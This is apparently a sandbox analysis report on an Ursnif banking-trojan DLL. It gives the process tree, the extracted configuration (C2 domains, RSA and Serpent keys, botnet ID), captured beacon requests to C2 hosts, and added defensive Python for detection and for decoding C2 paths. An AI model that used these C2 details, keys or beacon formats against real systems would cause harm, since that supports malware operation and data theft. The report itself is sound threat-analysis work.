
Windows Analysis Report 9091.dll

Overview

General Information

Sample Name: 9091.dll
Analysis ID: 548724
MD5: 8cef4bb6ea32fc461e3a954500413512
SHA1: d0612a06f724ebdb72db009010207c929aac9007
SHA256: 6a455667f74c818d5e20a83af8ba5eb8022b1714ceb9302c2b7f7f4ea1a141c9
Tags: dll, exe, Zloader

Detection

Ursnif
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Registers a DLL
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4908 cmdline: loaddll32.exe "C:\Users\user\Desktop\9091.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1364 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5032 cmdline: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 2332 cmdline: regsvr32.exe /s C:\Users\user\Desktop\9091.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 6008 cmdline: rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

Malware Configuration

Threatname: Ursnif

{
  "RSA Public Key": "aScpE7CilQ9VtygBXbwXm3cD296yz+RssVO+4h8dSJN8SwshLOZQ8SH7VEx70uuWiFjdqr+uklWJF/baQZUtCK4Bm7884qZ6qhDkBdiQK8V2zH0dHiFpHhB//0WN950qgmnuJAQbYHO78/vC+UGIVbVNILi+zFGHaDdiP/Ka/IdBmgobFFhN6+VD656EnLLJ",
  "c2_domain": ["google.mail.com", "firsone1.online", "kdsjdsadas.online"],
  "botnet": "9091",
  "server": "12",
  "serpent_key": "01026655AALLKENM",
  "sleep_time": "10",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0",
  "DGA_count": "10"
}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(47 entries in total; first 5 shown)

            Unpacked PEs

Source | Rule | Description | Author
0.2.loaddll32.exe.990000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
5.2.rundll32.exe.10000000.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
4.2.rundll32.exe.4400000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
4.2.rundll32.exe.10000000.3.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
5.2.rundll32.exe.ba0000.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(19 entries in total; first 5 shown)

                      Sigma Overview

                      System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started, Author: Florian Roth
Data:
    Command: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
    CommandLine: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
    CommandLine|base64offset|contains: (empty)
    Image: C:\Windows\SysWOW64\rundll32.exe
    NewProcessName: C:\Windows\SysWOW64\rundll32.exe
    OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
    ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
    ParentImage: C:\Windows\SysWOW64\cmd.exe
    ParentProcessId: 1364
    ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
    ProcessId: 5032
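The Sigma hit above keys on the ",#1" ordinal syntax in the rundll32 command line. As an added example (not the sandbox's output and not the cited Sigma rule's own code), the Python below runs that check together with two companion checks a detection engineer would pair with it, over event records constructed from the process tree and the "System process connects to network" signature in this report: a DLL loaded by rundll32 or regsvr32 from a user-writable directory, and a rundll32/regsvr32 process opening an outbound connection. The field names are Sysmon-style names chosen for the example, the benign control event is invented, and the network connection is attributed to PID 5032 because the report does not say which rundll32 instance made it. The SysWOW64 image paths are expected: on the 64-bit analysis host a 32-bit DLL (the report notes "Uses 32bit PE files") can only be loaded by the 32-bit copies of these loaders. loaddll32.exe is the sandbox's own loader and will not be the parent on a real host.

```python
"""Detection logic for the rundll32/regsvr32 chain recorded in this report.

Added example; not the sandbox's or the cited Sigma rule's code.  The event
records are constructed from the process tree and the "System process connects
to network" signature above, with Sysmon-style field names chosen for this
example.  The report does not say which rundll32 instance made the connection,
so it is attributed to PID 5032 here (assumption).
"""
import re
from collections import defaultdict

EVENTS = [
    # Values copied from the process tree; loaddll32.exe is the sandbox's own
    # loader, so in the wild the parent is whatever delivered the DLL.
    {"type": "process", "pid": 1364, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1',
     "parent_image": r"C:\Windows\System32\loaddll32.exe"},
    {"type": "process", "pid": 5032, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\user\Desktop\9091.dll",#1',
     "parent_image": r"C:\Windows\SysWOW64\cmd.exe"},
    {"type": "process", "pid": 2332, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\user\Desktop\9091.dll",
     "parent_image": r"C:\Windows\System32\loaddll32.exe"},
    {"type": "process", "pid": 6008, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer",
     "parent_image": r"C:\Windows\System32\loaddll32.exe"},
    # Destination from the "System process connects to network" signature; the
    # PID attribution is an assumption (see module docstring).
    {"type": "netconn", "pid": 5032, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "dst_ip": "134.0.117.195", "dst_port": 443},
    # Constructed benign control: rundll32 loading a DLL that lives in System32.
    {"type": "process", "pid": 7000, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "parent_image": r"C:\Windows\explorer.exe"},
]

RULE_ORDINAL = "rundll32 export called by ordinal"
RULE_USER_PATH = "DLL loaded from a user-writable path"
RULE_NETCONN = "DLL loader process opened an outbound connection"

# Sigma "Suspicious Call by Ordinal": the export is given as ",#N" instead of a name.
ORDINAL_EXPORT = re.compile(r",\s*#\d+\b")
# Directories an unprivileged user can write to (heuristic added for this example).
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.IGNORECASE)
DLL_LOADERS = ("\\rundll32.exe", "\\regsvr32.exe")


def is_dll_loader(image: str) -> bool:
    return image.lower().endswith(DLL_LOADERS)


def detect(events):
    """Return (pid, rule) pairs; one process can trip several rules."""
    findings = []
    for e in events:
        if not is_dll_loader(e["image"]):
            continue  # cmd.exe and other parents are not DLL loaders themselves
        if e["type"] == "process":
            if e["image"].lower().endswith("\\rundll32.exe") and ORDINAL_EXPORT.search(e["cmdline"]):
                findings.append((e["pid"], RULE_ORDINAL))
            if USER_WRITABLE.search(e["cmdline"]):
                findings.append((e["pid"], RULE_USER_PATH))
        elif e["type"] == "netconn":
            findings.append((e["pid"], RULE_NETCONN))
    return findings


def score(events):
    """Number of distinct rules tripped per PID.  Two or more on one process is
    the pattern to escalate; a lone user-writable-path hit is routine for installers."""
    hits = defaultdict(set)
    for pid, rule in detect(events):
        hits[pid].add(rule)
    return {pid: len(rules) for pid, rules in hits.items()}


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
    print(score(EVENTS))
```

Run against the records above, PID 5032 trips all three rules (ordinal call, user-writable path, outbound connection), PIDs 2332 and 6008 trip only the path rule, and the benign control trips nothing. Correlating the network event with the process event by PID is what separates this sample from a legitimate regsvr32 install; on a real host the same correlation is done on the process GUID rather than the reusable PID.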

                      Jbx Signature Overview


                      AV Detection:

Found malware configuration
Source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif (the configuration reproduced under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 9091.dll, VirusTotal: Detection: 22%
Source: 9091.dll, ReversingLabs: Detection: 30%
Machine Learning detection for sample
Source: 9091.dll, Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.regsvr32.exe.10000000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 5.2.rundll32.exe.10000000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 4.2.rundll32.exe.10000000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Uses 32bit PE files
Source: 9091.dll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown, HTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49803 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49812 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 134.0.117.195:443 -> 192.168.2.3:49813 version: TLS 1.2

                      Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 134.0.117.195 187
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: google.mail.com
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: firsone1.online
Source: C:\Windows\SysWOW64\regsvr32.exe, Domain query: kdsjdsadas.online
Source: Joe Sandbox View, ASN Name: AS-REGRU
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic, HTTP traffic detected:
    GET /jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9inDS3N_2BAw6xzSFVI4I3r/K9MZrdcrj9/apJueAkO6z3aFPMvl/1u8BPeULfl0I/HXQ5umECQED/KqvCLcJ4CKU902/Ue_2BCWirDHmDgB_2FqvO/givATx4gqqgglwS7/v4BEhQLSTM_2B/_2Fe_2Bu.mki HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: firsone1.online
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: firsone1.online
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNBu0uT/PguFQeLj5VBY4GnMnUK/UA0cB1h_2F_2BMAAiPyhOY/5Iw7z41oIrnZb/4nW_2Ff2/TobIBfFnKF4Ggs861byzcAY/C9cxP76_2B/WGhxpkLq_2Fup2HWB/_2BU22RdSz/9MAm9.mki HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: firsone1.online
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: firsone1.online
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown, Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49811
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 06 Jan 2022 10:52:39 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
    Content-Length: 460
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 06 Jan 2022 10:52:41 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
    Content-Length: 437
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 06 Jan 2022 10:52:42 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
    Content-Length: 449
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 06 Jan 2022 10:52:46 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
    Content-Length: 424
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: loaddll32.exe, 00000000.00000003.484041107.0000000000AC5000.00000004.00000001.sdmp; loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 9091.dll, String found in binary or memory: http://www.symantec.com
Source: loaddll32.exe, 00000000.00000003.484055973.0000000000ADA000.00000004.00000001.sdmp, String found in binary or memory: https://firsone1.online/jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu5
Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp, String found in binary or memory: https://google.mail.com/jkloll/SrOhqn0MT2IAkG_2B4u/QUT97q1sQV0r5x6X8tk4tl/QK7oXiqO2sMkr/Uet1eMX4/DBd
Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp, String found in binary or memory: https://kdsjdsadas.online/
Source: loaddll32.exe, 00000000.00000002.796286171.0000000000AC5000.00000004.00000020.sdmp, String found in binary or memory: https://kdsjdsadas.online/jkloll/n1yCX1bWO/IyJVfm7yH8jH38Bki7vn/f4C45hYEgppc8I7zVra/TaacUzdsuPU7_2Bk
Source: unknown, DNS traffic detected: queries for: google.mail.com
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00D45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError, 0_2_00D45988
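The four GET requests above carry the bot's check-in data in the request path itself. As an added example (not part of this report and not Joe Sandbox's or the malware's code), the Python below reverses the path obfuscation that can be read off these paths directly: slashes inserted at arbitrary positions (even inside an escape sequence, as in "wEqs_2/BsKh"), "_2B" and "_2F" in place of the base64 characters "+" and "/", and a file-like ".mki" extension. The recovered byte strings are all whole multiples of 16 bytes, which fits the report's "serpent_key" naming: public ISFB/Gozi analyses describe the payload as Serpent-CBC-encrypted with that 16-byte key, and that is the assumption this example makes without implementing the cipher itself. The user-agent is checked as a separate indicator: IE 8 was never released for Windows 10, which ships IE 11, so "MSIE 8.0" together with "Windows NT 10.0" cannot come from a real browser. All four requests received 404 responses, so there is no server data in this run to validate a decryption against. Note also that the first configured C2 name, google.mail.com, is a hostname under the mail.com webmail service and only received a DNS lookup here, while the HTTP exchanges went to firsone1.online; check each configured name before blocking it.

```python
"""Recover the encrypted payload carried in the Ursnif request paths above.

Added example, not part of the sandbox report.  The de-obfuscation steps are
inferred from the four paths in this report and from public ISFB/Gozi write-ups.
The Serpent-CBC decryption of the recovered bytes (keyed with the report's
serpent_key) is an assumption about the format and is not implemented here.
"""
import base64

# The four request paths copied verbatim from the HTTP traffic above.
PATHS = [
    "/jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9inDS3N_2BAw6xzSFVI4I3r/K9MZrdcrj9/apJueAkO6z3aFPMvl/1u8BPeULfl0I/HXQ5umECQED/KqvCLcJ4CKU902/Ue_2BCWirDHmDgB_2FqvO/givATx4gqqgglwS7/v4BEhQLSTM_2B/_2Fe_2Bu.mki",
    "/jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki",
    "/jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNBu0uT/PguFQeLj5VBY4GnMnUK/UA0cB1h_2F_2BMAAiPyhOY/5Iw7z41oIrnZb/4nW_2Ff2/TobIBfFnKF4Ggs861byzcAY/C9cxP76_2B/WGhxpkLq_2Fup2HWB/_2BU22RdSz/9MAm9.mki",
    "/jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki",
]

# User-Agent sent with every request above.
USER_AGENT = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"
SERPENT_BLOCK_SIZE = 16  # Serpent is a 128-bit block cipher


def recover_ciphertext(path: str) -> bytes:
    """Undo the path obfuscation and return the raw (still encrypted) payload."""
    # 1. Drop the leading directory ("/jkloll/") and the fake extension (".mki").
    body = path.split("/", 2)[2].rsplit(".", 1)[0]
    # 2. The bot inserts "/" at arbitrary positions, even inside an escape
    #    sequence ("...wEqs_2/BsKh..." above), so strip them before anything else.
    body = body.replace("/", "")
    # 3. "_2B" and "_2F" stand for the base64 characters "+" and "/" (their
    #    URL-encoding with "_" in place of "%").  The underscore is what marks
    #    them: "d2BD" in the fourth path is ordinary base64 and is left alone.
    body = body.replace("_2B", "+").replace("_2F", "/")
    # 4. Padding is omitted on the wire; restore it and decode strictly.
    body += "=" * (-len(body) % 4)
    return base64.b64decode(body, validate=True)


def is_spoofed_ie_user_agent(ua: str) -> bool:
    """IE 8 was never released for Windows 10 (which ships IE 11), so the
    MSIE 8.0 / Windows NT 10.0 combination cannot come from a real browser."""
    return "MSIE 8.0" in ua and "Windows NT 10.0" in ua


def describe(path: str) -> dict:
    """Per-request summary: payload size and whether it is a whole number of
    Serpent blocks, which a CBC-encrypted body has to be."""
    ct = recover_ciphertext(path)
    return {
        "ciphertext_len": len(ct),
        "whole_blocks": len(ct) % SERPENT_BLOCK_SIZE == 0,
        "extension": path.rsplit(".", 1)[1],
    }


if __name__ == "__main__":
    print("spoofed user-agent:", is_spoofed_ie_user_agent(USER_AGENT))
    for p in PATHS:
        print(describe(p))
```

The four paths decode to 160, 144, 160 and 144 bytes respectively, each a whole number of 16-byte blocks. For network detection the stable features are the ones the decoder relies on: a deep path of random-looking segments containing "_2B" or "_2F", an extension that does not match any served content, and the contradictory IE 8 / Windows 10 user-agent; the first path component ("/jkloll/") and the extension are configuration values and will differ between botnets.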

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match, file source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
Source: Yara match, file source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.rundll32.exe.4280000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.rundll32.exe.46d94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.2b694a0.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.47e94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.regsvr32.exe.4a994a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.d40000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.47e94a0.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 4.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
